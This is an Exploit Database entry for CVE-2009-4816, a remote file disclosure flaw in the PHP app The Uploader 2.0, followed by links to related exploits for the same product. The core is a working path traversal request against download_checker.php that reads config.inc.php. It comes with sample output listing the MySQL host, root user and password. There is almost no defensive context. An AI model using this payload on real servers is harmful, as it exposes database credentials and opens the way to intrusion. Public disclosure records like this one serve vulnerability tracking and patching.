Exploit Database - Logo

The Uploader 2.0 - File Disclosure

EDB-ID: 10599 Author: Stack Published: 2009-12-22
CVE: CVE-2009-4816 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
# Title: The Uploader 2.0 Remote File disclosure Vulnerability
# Author: Stack

http://server/the_uploader/api/download_checker.php?filename=../config.inc.php

next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d

//MySQL configuration and connection functions
$main['host']="127.0.0.1";
$main['user']="root";
$main['pass']="jH445Ui";
$main['dbnm']="jkL_database";

Related Exploits

Trying to match CVEs (1): CVE-2009-4816
Trying to match OSVDBs (1): 61270
Other Possible E-DB Search Terms: The Uploader 2.0,  The Uploader
Date D V Title Author
2009-12-22Download Exploit Code Verified The Uploader 2.0 - Arbitrary File UploadMaster Mind
2010-06-22Download Exploit Code Verified The Uploader 2.0.4 - Remote File DisclosureXa7m3d
2012-02-23Download Exploit Code Waiting verification The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)Danny Moules
Menu